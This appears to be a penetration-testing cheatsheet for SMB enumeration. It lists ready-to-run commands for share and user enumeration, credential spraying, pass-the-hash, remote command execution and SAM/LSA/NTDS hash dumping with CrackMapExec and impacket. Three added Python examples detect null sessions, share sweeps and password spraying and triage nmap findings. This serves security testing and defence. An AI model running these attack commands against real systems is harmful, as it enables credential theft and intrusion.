SMB Enumeration Cheatsheet

Default Ports: 445 (TCP), 139 (TCP/NetBIOS), 137–138 (UDP)


Initial Scanning

nmap -p 139,445 -sV <ip>
nmap -p 445 --script smb-os-discovery <ip>
nmap -p 445 --script smb-security-mode <ip>
nmap -p 445 --script smb2-security-mode <ip>
nmap -p 139,445 --script "smb-*" <ip>            # All SMB scripts (quote the glob so the shell does not expand it)
nmap -p 445 --script "smb-vuln-*" <ip>           # All vuln checks

NetBIOS / NBT Scanning

nbtscan <ip>
nbtscan -r 192.168.1.0/24
nmblookup -A <ip>

enum4linux / enum4linux-ng

# Classic
enum4linux -a <ip>                               # All checks
enum4linux -u <user> -p <pass> <ip>              # Authenticated
enum4linux -S <ip>                               # Shares only
enum4linux -U <ip>                               # Users only
enum4linux -P <ip>                               # Password policy

# Newer (recommended)
enum4linux-ng -A <ip>
enum4linux-ng -A <ip> -u <user> -p <pass>
enum4linux-ng -A <ip> -oA output

smbclient

# List shares
smbclient -L //<ip>/ -N                          # Null session
smbclient -L //<ip>/ -U <user>%<pass>            # Authenticated

# Connect to share
smbclient //<ip>/<share> -N
smbclient //<ip>/<share> -U <user>%<pass>
smbclient //<ip>/<share> -U <domain>/<user>%<pass>

# Within smbclient shell
ls                    # List files
cd <dir>              # Change directory
get <file>            # Download file
put <file>            # Upload file
recurse ON            # Enable recursive operations
prompt OFF            # Disable prompts
mget *                # Download everything
mput *                # Upload everything
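The null-session listing above (smbclient -N, and enum4linux's anonymous checks) leaves a recognisable trail on a Windows file server: a network logon as ANONYMOUS LOGON, and a burst of share connections from one source when every share is probed in turn. The following detection is an added example, not part of the cheatsheet. Its input is constructed JSON lines modelled on the fields of Security events 4624 (logon, LogonType 3 = network) and 5140 (network share object accessed); a real export from Get-WinEvent or a SIEM is shaped differently, so the field names are an assumption, and the addresses, users and share names are placeholders.

```python
"""Spot null-session logons and share enumeration in Windows Security events.

Added example, not from the cheatsheet. The records below are constructed
JSON lines modelled on Windows Security events 4624 (logon, LogonType 3 =
network) and 5140 (network share object accessed). Field names are an
assumption of this example; addresses, users and shares are placeholders.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 10.0.0.50 opens a null session, 10.0.0.51 sweeps five
# shares in three seconds, 10.0.0.52 is a user opening one share.
SAMPLE_EVENTS = r"""
{"time": "2024-05-01T09:00:01", "EventID": 4624, "LogonType": 3, "TargetUserName": "ANONYMOUS LOGON", "IpAddress": "10.0.0.50"}
{"time": "2024-05-01T09:00:01", "EventID": 5140, "SubjectUserName": "ANONYMOUS LOGON", "ShareName": "\\\\*\\IPC$", "IpAddress": "10.0.0.50"}
{"time": "2024-05-01T09:05:10", "EventID": 4624, "LogonType": 3, "TargetUserName": "jsmith", "IpAddress": "10.0.0.51"}
{"time": "2024-05-01T09:05:11", "EventID": 5140, "SubjectUserName": "jsmith", "ShareName": "\\\\*\\IPC$", "IpAddress": "10.0.0.51"}
{"time": "2024-05-01T09:05:11", "EventID": 5140, "SubjectUserName": "jsmith", "ShareName": "\\\\*\\ADMIN$", "IpAddress": "10.0.0.51"}
{"time": "2024-05-01T09:05:12", "EventID": 5140, "SubjectUserName": "jsmith", "ShareName": "\\\\*\\C$", "IpAddress": "10.0.0.51"}
{"time": "2024-05-01T09:05:12", "EventID": 5140, "SubjectUserName": "jsmith", "ShareName": "\\\\*\\Finance", "IpAddress": "10.0.0.51"}
{"time": "2024-05-01T09:05:13", "EventID": 5140, "SubjectUserName": "jsmith", "ShareName": "\\\\*\\HR", "IpAddress": "10.0.0.51"}
{"time": "2024-05-01T11:30:00", "EventID": 4624, "LogonType": 3, "TargetUserName": "asmith", "IpAddress": "10.0.0.52"}
{"time": "2024-05-01T11:30:01", "EventID": 5140, "SubjectUserName": "asmith", "ShareName": "\\\\*\\Finance", "IpAddress": "10.0.0.52"}
"""

NULL_SESSION_USER = "ANONYMOUS LOGON"
SHARE_ENUM_THRESHOLD = 4                # distinct shares from one source ...
SHARE_ENUM_WINDOW = timedelta(minutes=5)  # ... inside this window


def load_events(text):
    """Parse JSON lines into dicts with 'time' as a datetime, oldest first."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ev = json.loads(line)
            ev["time"] = datetime.fromisoformat(ev["time"])
            events.append(ev)
    return sorted(events, key=lambda e: e["time"])


def detect(events, threshold=SHARE_ENUM_THRESHOLD, window=SHARE_ENUM_WINDOW):
    """Return alert strings: one per null-session logon, one per share sweep."""
    alerts = []
    # Rule 1: a network logon as ANONYMOUS LOGON is a null session.
    for ev in events:
        if (ev["EventID"] == 4624 and ev.get("LogonType") == 3
                and ev.get("TargetUserName") == NULL_SESSION_USER):
            alerts.append(f"null-session logon from {ev['IpAddress']} "
                          f"at {ev['time'].isoformat()}")
    # Rule 2: one source opening many distinct shares in a short window is a
    # share sweep; a single user session normally touches one or two shares.
    accesses = defaultdict(list)
    for ev in events:
        if ev["EventID"] == 5140:
            accesses[ev["IpAddress"]].append(ev)
    for src, evs in accesses.items():
        for i, first in enumerate(evs):
            in_window = [e for e in evs[i:] if e["time"] - first["time"] <= window]
            shares = {e["ShareName"] for e in in_window}
            if len(shares) >= threshold:
                alerts.append(f"share enumeration from {src} as "
                              f"{first.get('SubjectUserName')}: {len(shares)} shares "
                              f"within {window}")
                break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for alert in detect(load_events(SAMPLE_EVENTS)):
        print(alert)
```

On the sample, rule 1 fires for 10.0.0.50 and rule 2 for 10.0.0.51; 10.0.0.52 stays quiet. Both event IDs are only logged when the Logon and File Share audit subcategories are enabled, so check the audit policy before relying on this. Null sessions themselves are closed off by the "Network access: Do not allow anonymous enumeration of SAM accounts and shares" policy and by not exposing 445 beyond the hosts that need it.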

CrackMapExec (CME)

# Basic info
crackmapexec smb <ip>
crackmapexec smb 192.168.1.0/24

# Authenticated enum
crackmapexec smb <ip> -u <user> -p <pass>
crackmapexec smb <ip> -u <user> -p <pass> --shares
crackmapexec smb <ip> -u <user> -p <pass> --users
crackmapexec smb <ip> -u <user> -p <pass> --groups
crackmapexec smb <ip> -u <user> -p <pass> --sessions
crackmapexec smb <ip> -u <user> -p <pass> --loggedon-users
crackmapexec smb <ip> -u <user> -p <pass> --local-groups

# Credential spraying
crackmapexec smb 192.168.1.0/24 -u <user> -p <pass> --continue-on-success
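On the receiving end, a spray like the one above produces a stream of failed logons (event 4625, LogonType 3) from one source against many different accounts in a short time, which is the signature worth alerting on; a brute force against a single account fails on one name instead. The detector below is an added example, not part of the cheatsheet. Its input is a constructed tab-separated export of 4625 records carrying only the fields a SIEM would normally keep (time, target user, source IP, NTSTATUS code); that column layout is an assumption of this example, and the accounts and addresses are placeholders.

```python
"""Flag password spraying in failed-logon records.

Added example, not from the cheatsheet. Input is a constructed tab-separated
export of Windows Security 4625 events: time, target user, source IP and the
NTSTATUS code (0xC000006D = bad user name or password, 0xC0000064 = account
does not exist). The column layout is an assumption of this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 10.0.0.50 tries one password against six accounts in
# ten seconds; 10.0.0.51 is a user mistyping their own password three times.
SAMPLE_4625 = """\
2024-05-01T08:00:00\tadministrator\t10.0.0.50\t0xC000006D
2024-05-01T08:00:02\tjsmith\t10.0.0.50\t0xC000006D
2024-05-01T08:00:04\tasmith\t10.0.0.50\t0xC000006D
2024-05-01T08:00:06\tbjones\t10.0.0.50\t0xC000006D
2024-05-01T08:00:08\tsvc_backup\t10.0.0.50\t0xC000006D
2024-05-01T08:00:10\tnosuchuser\t10.0.0.50\t0xC0000064
2024-05-01T08:10:00\tjsmith\t10.0.0.51\t0xC000006D
2024-05-01T08:12:00\tjsmith\t10.0.0.51\t0xC000006D
2024-05-01T08:15:00\tjsmith\t10.0.0.51\t0xC000006D
"""

DISTINCT_USERS = 5          # distinct accounts failed from one source ...
WINDOW = timedelta(minutes=10)  # ... inside this sliding window
STATUS_NO_SUCH_USER = "0xC0000064"


def parse(text):
    """Return (time, user, source_ip, status) tuples; user names are case-folded."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, src, status = line.split("\t")
        rows.append((datetime.fromisoformat(ts), user.lower(), src, status))
    return rows


def find_sprays(rows, distinct_users=DISTINCT_USERS, window=WINDOW):
    """Return {source_ip: details} for every source that fails against
    at least distinct_users different accounts within one window."""
    by_src = defaultdict(list)
    for ts, user, src, status in sorted(rows):
        by_src[src].append((ts, user, status))
    sprays = {}
    for src, attempts in by_src.items():
        j = 0
        for i, (start, _, _) in enumerate(attempts):
            # Extend the window forward from attempt i; j never moves backwards.
            while j < len(attempts) and attempts[j][0] - start <= window:
                j += 1
            seen = attempts[i:j]
            users = {u for _, u, _ in seen}
            if len(users) >= distinct_users:
                sprays[src] = {
                    "first": start,
                    "users": sorted(users),
                    # guessed names that do not exist hint at a borrowed user list
                    "unknown_accounts": sum(1 for _, _, s in seen if s == STATUS_NO_SUCH_USER),
                }
                break  # one alert per source is enough
    return sprays


if __name__ == "__main__":
    for src, details in find_sprays(parse(SAMPLE_4625)).items():
        print(f"{src}: {len(details['users'])} accounts from {details['first']}, "
              f"{details['unknown_accounts']} of them non-existent")
```

The threshold and window are the tuning knobs: a spray paced to stay under the lockout policy spreads its attempts out, so the window has to be wider than the lockout observation window to catch it. When the targets are domain accounts, the domain controller records the same failures as 4776 (NTLM) or 4771 (Kerberos pre-authentication) and the per-source distinct-account rule applies there unchanged.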

# Pass-the-Hash
crackmapexec smb <ip> -u <user> -H <nthash>

# Command execution
crackmapexec smb <ip> -u <user> -p <pass> -x 'whoami'       # CMD
crackmapexec smb <ip> -u <user> -p <pass> -X 'whoami'       # PowerShell

# Dump SAM/LSA
crackmapexec smb <ip> -u <user> -p <pass> --sam
crackmapexec smb <ip> -u <user> -p <pass> --lsa
crackmapexec smb <ip> -u <user> -p <pass> -M ntdsutil       # NTDS.dit

impacket Tools

python3 smbclient.py <domain>/<user>:<pass>@<ip>
python3 samrdump.py <domain>/<user>:<pass>@<ip>
python3 rpcdump.py <domain>/<user>:<pass>@<ip>
python3 lookupsid.py <domain>/<user>:<pass>@<ip>
python3 secretsdump.py <domain>/<user>:<pass>@<ip>      # Dump all hashes
python3 secretsdump.py -just-dc-ntlm <domain>/<user>:<pass>@<ip>

Mounting SMB Shares

# Linux mount (the mount point must exist first: mkdir -p /mnt/smb)
sudo mount -t cifs //<ip>/<share> /mnt/smb -o username=<user>,password=<pass>
sudo mount -t cifs //<ip>/<share> /mnt/smb -o username=<user>,password=<pass>,domain=<domain>
# An inline password ends up in shell history and in ps output; mount.cifs's credentials=<file> option keeps it out of both

Key Vulnerabilities

CVE             Name                     Description
CVE-2017-0144   EternalBlue / MS17-010   SMBv1 RCE — WannaCry / NotPetya
CVE-2020-0796   SMBGhost                 SMBv3.1.1 compression RCE
CVE-2021-34527  PrintNightmare           Print Spooler RCE via SMB

# EternalBlue check
nmap -p 445 --script smb-vuln-ms17-010 <ip>
use auxiliary/scanner/smb/smb_ms17_010              # Metasploit (msfconsole)

# SMBGhost check
nmap -p 445 --script smb-vuln-cve2020-0796 <ip>
use auxiliary/scanner/smb/cve_2020_0796_smbghost    # Metasploit (msfconsole)
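The security-mode scripts from Initial Scanning and the table above meet in two settings: SMBv1 still being offered (the precondition for MS17-010) and message signing not being required (the precondition for NTLM relay). When a whole subnet has been scanned, reading that out of raw nmap output by eye is error-prone, so here is an added example, not from the cheatsheet, that turns the normal output of nmap's smb-protocols, smb-security-mode and smb2-security-mode scripts into a per-host list of things to fix. The scan output embedded in it is constructed for the example; the hostnames and addresses are placeholders.

```python
"""Triage nmap SMB script output into per-host hardening findings.

Added example, not part of the cheatsheet. It reads the normal output of
`nmap -p 445 --script smb-protocols,smb-security-mode,smb2-security-mode`
and flags SMBv1 being offered, guest/null access and signing not required.
The scan output below is constructed; hostnames and addresses are placeholders.
"""
import re

SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for fileserver01.example.internal (10.0.0.5)
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-protocols: 
|   dialects: 
|     NT LM 0.12 (SMBv1) [dangerous, but default]
|     2.0.2
|     2.1
|     3.0
|_    3.1.1
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Nmap scan report for dc01.example.internal (10.0.0.10)
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-protocols: 
|   dialects: 
|     2.0.2
|     2.1
|     3.0
|_    3.1.1
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)(?: \((\d+\.\d+\.\d+\.\d+)\))?", re.M)
SCRIPTS = {"smb-protocols:", "smb-security-mode:", "smb2-security-mode:"}


def script_lines(block):
    """Yield NSE output lines with nmap's '| ' and '|_ ' prefixes stripped."""
    for line in block.splitlines():
        if line.startswith("|"):
            yield line.lstrip("|_ ").rstrip()


def triage(nmap_output):
    """Return {host: [finding, ...]}; an empty list means nothing to fix."""
    findings = {}
    reports = list(HOST_RE.finditer(nmap_output))
    for i, m in enumerate(reports):
        end = reports[i + 1].start() if i + 1 < len(reports) else len(nmap_output)
        host = m.group(2) or m.group(1)   # prefer the IP, fall back to the name
        hits = []
        script = None
        for line in script_lines(nmap_output[m.start():end]):
            if line in SCRIPTS:
                script = line              # section header such as 'smb-protocols:'
                continue
            if script == "smb-protocols:" and "(SMBv1)" in line:
                hits.append("smbv1-enabled: MS17-010 attack surface; disable SMBv1")
            elif script == "smb-security-mode:":
                if line == "account_used: guest":
                    hits.append("guest-access: null/guest sessions accepted; restrict anonymous access")
                elif line.startswith("message_signing:") and not line.endswith("required"):
                    hits.append("smb1-signing-not-required: " + line.split(": ", 1)[1])
            elif script == "smb2-security-mode:" and line.startswith("Message signing"):
                if "and required" not in line:
                    hits.append("smb2-signing-not-required: NTLM relay exposure; require signing")
        findings[host] = hits
    return findings


if __name__ == "__main__":
    for host, hits in triage(SAMPLE_NMAP_OUTPUT).items():
        print(host, "OK" if not hits else "")
        for hit in hits:
            print("  -", hit)
```

Feed it the file written by -oN; the two hosts in the sample come out as four findings for 10.0.0.5 and a clean bill for 10.0.0.10. The script names and output wording are nmap's own, so if a newer NSE version rewords a line the matching here has to follow.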